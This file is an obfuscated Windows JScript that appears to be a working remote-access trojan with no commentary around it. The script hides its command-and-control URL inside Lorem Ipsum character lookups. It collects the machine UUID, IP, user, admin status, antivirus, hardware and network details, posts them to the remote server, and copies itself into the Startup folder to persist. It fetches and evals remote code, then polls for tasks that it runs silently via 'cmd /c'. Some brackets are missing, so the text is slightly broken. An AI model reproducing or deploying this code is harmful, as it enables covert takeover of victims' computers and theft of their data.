var RAuoAdQ = "abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyz";
var VrShxxz = RAuoAdQ;
var FagtBRC = 'no';
var i = 0;
while(FagtBRC === 'no') {
var RAuoAdQ = "abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyz";
if(RAuoAdQ.charAt(Math.floor(Math.random() * 32) + 1) === KNPVIWL(1)) {
var VrShxxz = RAuoAdQ;
var rXILAWO = VrShxxz.indexOf("t");
var afJQUKt = RAuoAdQ.charAt(rXILAWO);
var FagtBRC = 'yes';
break;
function KNPVIWL(KdDVBvX) {
var KHkFYsj = '';
var nEuTLXU = 'abcdefghijklmnopqrstuvwxyz[][][][[][][]][[][][]][[][][][]][{{}{}}{][[}{{}[]}][[][][]][[][][]][[][][][]][{{}{}}{][[}{{}[]}][[][][]][[][][]][[][][][]][{{}{}}{][[}{{}[]}][[][][]][[][][]][[][][][]][{{}{}}{][[}{{}[]}][[][][]][[][][]][[][][][]][{{}{}}{][[}{{}[]}][[][][]][[][][]][[][][][]][{{}{}}{][[}{{}[]}][[][][]][[][][]][[][][][]][{{}{}}{][[}{{}[]}][[][][]][[][][]][[][][][]][{{}{}}{][[}{{}[]}][[][][]][[][][]][[][][][]][{{}{}}{][[}{{}[]}][[][][]][[][][]][[][][][]][{{}{}}{][[}{{}[]}][[][][]][[][][]][[][][][]][{{}{}}{][[}{{}[]}][[][][]][[][][]][[][][][]][{{}{}}{][[}{{}[]}][[][][]][[][][]][[][][][]][{{}{}}{][[}{{}[]}][[][][]][[][][]][[][][][]][{{}{}}{][[}{{}[]}][[][][]][[][][]][[][][][]][{{}{}}{][[}{{}[]}][[][][]][[][][]][[][][][]][{{}{}}{][[}{{}[]}][[][][]][[][][]][[][][][]][{{}{}}{][[}{{}[]}][[][][]][[][][]][[][][][]][{{}{}}{][[}{{}[]}][[][][]][[][][]][[][][][]][{{}{}}{][[}{{}[]}][[][][]][[][][]][[][][][]][{{}{}}{][[}{{}[]}][[][][]][[][][]][[][][][]][{{}{}}{][[}{{}[]}][[][][]][[][][]][[][][][]][{
var nnGDira = nEuTLXU.KdDVBvX;
for ( var i = 0; i < KdDVBvX; i++ ) {
KHkFYsj += nEuTLXU.charAt(Math.floor(Math.random() * nnGDira));
return KHkFYsj;
var YXfOZry = "1506";
var wOXyWhn = "Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.:Why do we use it?It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. The point of using Lorem Ipsum is that it has a more-or-less normal distribution of letters, as opposed to using 'Content here, content here', making it look like readable English. Many desktop publishing packages and web page editors now use Lorem Ipsum as their default model text, and a se
var YunoIhy = "h"+afJQUKt+"t"+wOXyWhn.charAt(7)+wOXyWhn.charAt(203)+"://roo"+afJQUKt+wOXyWhn.charAt(7)+"a"+wOXyWhn.charAt(203)+wOXyWhn.charAt(203)+"."+wOXyWhn.charAt(1061)+wOXyWhn.charAt(948)+wOXyWhn.charAt(814)+wOXyWhn.charAt(1198)+wOXyWhn.charAt(1037)+wOXyWhn.charAt(1166)+wOXyWhn.charAt(579)+wOXyWhn.charAt(631)+wOXyWhn.charAt(620)+wOXyWhn.charAt(605)+wOXyWhn.charAt(573)+wOXyWhn.charAt(7)+wOXyWhn.charAt(613)+wOXyWhn.charAt(7);
var jpSqEQt = 11;
var dSfgutV = 3;
var UdQazMD = "Active";
WScript.Sleep(Math.floor(Math.random() * 10000) + 1);
var NjpgDWN = new ActiveXObject("WScrip"+afJQUKt+".S"+wOXyWhn.charAt(402)+"ell");
var JgICoiO = NjpgDWN.ExpandEnvironmentStrings("%APPDATA%");
var mVKjvJw = WScript.ScriptFullName;
var mcOiLES = WScript.ScriptName;
var vtCpRHO = WScript.createObject("WScrip"+afJQUKt+".S"+wOXyWhn.charAt(402)+"ell");
zFvpVse();
var pzlDYqj = IlOTjHC();
DSpynSa();
while (UdQazMD == "Active") {
LMVksMz(sAOAPHg());
WScript.sleep(jpSqEQt * 1000);
LMVksMz(ELfhYot());
function sAOAPHg() {
var dwZxdgp;
try {
var KzgfKqC = new ActiveXObject("WinHttp.WinH"+afJQUKt+"tpRequest.5.1");
var vNjyoOu = KzgfKqC.Open("POST", YunoIhy, false);
KzgfKqC.SetRequestHeader("Content-Type", "application/json");
KzgfKqC.SetRequestHeader("sode", "info");
KzgfKqC.SetRequestHeader("thatsuser", pzlDYqj["uuid"]);
KzgfKqC.SetRequestHeader("version", YXfOZry);
KzgfKqC.Send(JSON.stringify(pzlDYqj));
KzgfKqC.WaitForResponse();
dwZxdgp = KzgfKqC.ResponseText;
} catch (objError) {
dwZxdgp = objError + "\n"
dwZxdgp += "WinHTTP returned error: " +
(objError.number & 0xFFFF).toString() + "\n\n";
dwZxdgp += objError.description;
return dwZxdgp;
function ELfhYot() {
var dwZxdgp;
try {
var KzgfKqC = new ActiveXObject("WinHttp.WinHt"+afJQUKt+"pRequest.5.1");
var vNjyoOu = KzgfKqC.Open("POST", YunoIhy, false);
KzgfKqC.SetRequestHeader("Accept", "application/json");
KzgfKqC.SetRequestHeader("sode", "smack");
KzgfKqC.SetRequestHeader("thatsuser", pzlDYqj["uuid"]);
KzgfKqC.SetRequestHeader("version", YXfOZry);
KzgfKqC.Send();
KzgfKqC.WaitForResponse();
dwZxdgp = KzgfKqC.ResponseText;
} catch (objError) {
dwZxdgp = objError + "\n"
dwZxdgp += "WinHTTP returned error: " +
(objError.number & 0xFFFF).toString() + "\n\n";
dwZxdgp += objError.description;
return dwZxdgp;
function mQqDLPn(str) {
var MSRUgQW = "";
for (var i = str.length - 1; i >= 0; i--) {
MSRUgQW += str[i];
return MSRUgQW;
function jNAJBaE(taskID, result, details) {
var dwZxdgp;
try {
var KzgfKqC = new ActiveXObject("WinHttp.WinHt"+afJQUKt+"pRequest.5.1");
var vNjyoOu = KzgfKqC.Open("POST", YunoIhy, false);
KzgfKqC.SetRequestHeader("Accept", "application/json");
KzgfKqC.SetRequestHeader("sode", "task");
KzgfKqC.SetRequestHeader("thatsuser", pzlDYqj["uuid"]);
KzgfKqC.SetRequestHeader("taskID", taskID);
KzgfKqC.SetRequestHeader("result", result);
KzgfKqC.SetRequestHeader("details", details);
KzgfKqC.Send();
KzgfKqC.WaitForResponse();
dwZxdgp = KzgfKqC.ResponseText;
} catch (objError) {
dwZxdgp = objError + "\n"
dwZxdgp += "WinHTTP returned error: " +
(objError.number & 0xFFFF).toString() + "\n\n";
dwZxdgp += objError.description;
function LMVksMz(tasksJson) {
if (tasksJson.length < 5) {
return;
var result = 'False';
var attempts = 0;
var YWwgjuJ = "";
try {
tasks = JSON.parse(tasksJson);
} catch (err) {
return;
for (var task in tasks) {
result = 'False';
attempts = dSfgutV;
YWwgjuJ = "";
while ( (attempts > 0) && (result != 'True') ) {
switch (tasks[task]["type"]) {
case "We have only this":
result = jzjTLCi(tasks[task]["content"]);
if (result == 'False')
YWwgjuJ = "Error";
break;
default:
result = 'False';
YWwgjuJ = "Error";
break;
}
if (result == 'False')
attempts--;
else
YWwgjuJ = "Success";
jNAJBaE(tasks[task]["id"], result, YWwgjuJ);
}
};
function jzjTLCi(command) {
try {
new ActiveXObject("W"+"S"+"c"+"r"+"i"+"p"+wOXyWhn.charAt(349)+".S"+wOXyWhn.charAt(402)+"ell").Run("cmd /c "+command+"",0);
return 'True';
} catch (err) {
return 'False';
function TLCWZSS(command) {
var HoeWazh = new ActiveXObject("Scripting.FileSystemObject");
var kyLuZfK = new ActiveXObject("WScrip"+wOXyWhn.charAt(349)+".S"+wOXyWhn.charAt(402)+"ell");
do {
var DoSsuRk = HoeWazh.BuildPath(HoeWazh.GetSpecialFolder(2), HoeWazh.GetTempName());
} while ( HoeWazh.FileExists(DoSsuRk) );
var dUtMkOs = HoeWazh.BuildPath(HoeWazh.GetSpecialFolder(1), "cmd.exe") + ' /C ' + command + ' > "' + DoSsuRk + '"';
kyLuZfK.Run(dUtMkOs, 0, true);
var JRMqcbd = "";
try {
var UBHfyHY = HoeWazh.OpenTextFile(DoSsuRk, 1, false);
JRMqcbd = UBHfyHY.ReadAll();
UBHfyHY.Close();
} catch (err) { }
return JRMqcbd;
function IlOTjHC() {
var LlzNXGY = new Object();
try {
var IJVwDBM = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2");
for ( var i=new Enumerator(IJVwDBM.ExecQuery("SELECT * FROM Win32_ComputerSystemProduct")); !i.atEnd(); i.moveNext() )
LlzNXGY["uuid"] = i.item().UUID;
} catch (err) {
LlzNXGY["uuid"] = 'N/A';
try {
var qFTetiY = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
qFTetiY.Open("GET", "https://api.ipify.org/", false);
qFTetiY.Send();
qFTetiY.WaitForResponse();
PdaRHHd = qFTetiY.ResponseText;
LlzNXGY["ip"] = PdaRHHd.replace(/^\s+|\s+$/g, '');
} catch (err) {
LlzNXGY["ip"] = 'N/A';
try {
LlzNXGY["location"] = 'N/A';
} catch (err) {
LlzNXGY["location"] = 'N/A';
try {
for ( var i=new Enumerator(IJVwDBM.ExecQuery("SELECT * FROM Win32_OperatingSystem")); !i.atEnd(); i.moveNext() )
LlzNXGY["os"] = i.item().Caption;
} catch (err) {
LlzNXGY["os"] = 'N/A';
try {
var vtCpRHO = new ActiveXObject("WScrip"+wOXyWhn.charAt(349)+".S"+wOXyWhn.charAt(402)+"ell");
var SNXBcVt = new ActiveXObject("WScrip"+afJQUKt+".Ne"+afJQUKt+"work");
LlzNXGY["user"] = SNXBcVt.ComputerName + '/' + vtCpRHO.ExpandEnvironmentStrings("%USERNAME%");
} catch (err) {
LlzNXGY["user"] = 'N/A';
try {
LlzNXGY["role"] = "User";
var groupObj = GetObject("WinNT://" + SNXBcVt.UserDomain + "/" + vtCpRHO.ExpandEnvironmentStrings("%USERNAME%"))
for (propObj in groupObj.Members)
if (propObj.Name == "Administrators")
LlzNXGY["role"] = "Admin";
} catch (err) {
LlzNXGY["role"] = 'N/A';
try {
var ThRPOpn = GetObject("winmgmts:root\\SecurityCenter2");
for ( var i=new Enumerator(ThRPOpn.ExecQuery("SELECT * FROM AntivirusProduct")); !i.atEnd(); i.moveNext() )
if (!LlzNXGY["antivirus"])
LlzNXGY["antivirus"] = i.item().displayName;
} catch (err) {
LlzNXGY["antivirus"] = 'N/A';
try {
for ( var i=new Enumerator(IJVwDBM.ExecQuery("SELECT * FROM Win32_Processor")); !i.atEnd(); i.moveNext() )
LlzNXGY["cpu"] = i.item().Name;
} catch (err) {
LlzNXGY["cpu"] = 'N/A';
try {
for ( var i=new Enumerator(IJVwDBM.ExecQuery("SELECT * FROM Win32_VideoController")); !i.atEnd(); i.moveNext() )
LlzNXGY["gpu"] = i.item().Name;
} catch (err) {
LlzNXGY["gpu"] = 'N/A';
try {
var ramObj = WScript.CreateObject("Shell.Applica"+afJQUKt+"ion");
LlzNXGY["ram"] = Math.round(ramObj.GetSystemInformation("PhysicalMemoryInstalled") / 1048576) + ' MB';
} catch (err) {
LlzNXGY["ram"] = 'N/A';
try {
var available = 0;
var total = 0;
for ( var i=new Enumerator(IJVwDBM.ExecQuery("SELECT * FROM Win32_LogicalDisk")); !i.atEnd(); i.moveNext() ) {
if (i.item().Size != null) {
available += (i.item().FreeSpace / 1024 / 1024 / 1024);
total += (i.item().Size / 1024 / 1024 / 1024);
}
}
LlzNXGY["storage"] = Math.round(available) + ' / ' + Math.round(total) + ' GB';
} catch (err) {
LlzNXGY["storage"] = '0 / 0 GB';
try {
var pcs = 0;
var output = TLCWZSS("net view");
var lines = output.split('\n');
if (lines.length > 6)
pcs = lines.length - 6;
LlzNXGY["network"] = pcs;
} catch (err) {
LlzNXGY["network"] = '0';
try {
var output = 0;
var output = TLCWZSS("wmic computersystem get domain");
LlzNXGY["nw_domain"] = output;
} catch (err) {
LlzNXGY["nw_domain"] = '0';
LlzNXGY["version"] = YXfOZry;
return LlzNXGY;
function DSpynSa() {
try {
rUnjclo = JgICoiO + '\\Microsoft\\Windows\\Star'+afJQUKt+' Menu\\Programs\\S'+afJQUKt+'artup\\';
Tmognvl = WScript.CreateObject('Scrip'+afJQUKt+'ing.FileSystemObject');
Tmognvl.CopyFile(mVKjvJw, rUnjclo);
} catch (err) { return; }
function zFvpVse() {
var jSjbvZk = WSH.CreateObject('Microsoft.XMLHTTP'),
HLgjEVg = WSH.CreateObject('Scrip'+afJQUKt+'ing.FileSys'+afJQUKt+'emObject'),
vNjyoOu = WSH.CreateObject("WScrip"+wOXyWhn.charAt(349)+".S"+wOXyWhn.charAt(402)+"ell").Environment('Process')('temp'),
jHHjylf = 'https://raw.githubusercontent.com/douglascrockford/JSON-js/master/json2.js'
if (HLgjEVg.FileExists(vNjyoOu + '\\json2.js')) {
jHHjylf = HLgjEVg.OpenTextFile(vNjyoOu + '\\json2.js', 1);
eval(jHHjylf.ReadAll());
jHHjylf.Close();
else {
with (jSjbvZk) {
open("GET", jHHjylf, true);
setRequestHeader('User-Agent', 'XMLHTTP/1.0');
send('');
}
while (jSjbvZk.readyState != 4) WSH.Sleep(50);
eval(jSjbvZk.responseText);
jHHjylf = HLgjEVg.CreateTextFile(vNjyoOu + '\\json2.js', true);
jHHjylf.Write(jSjbvZk.responseText);
jHHjylf.Close();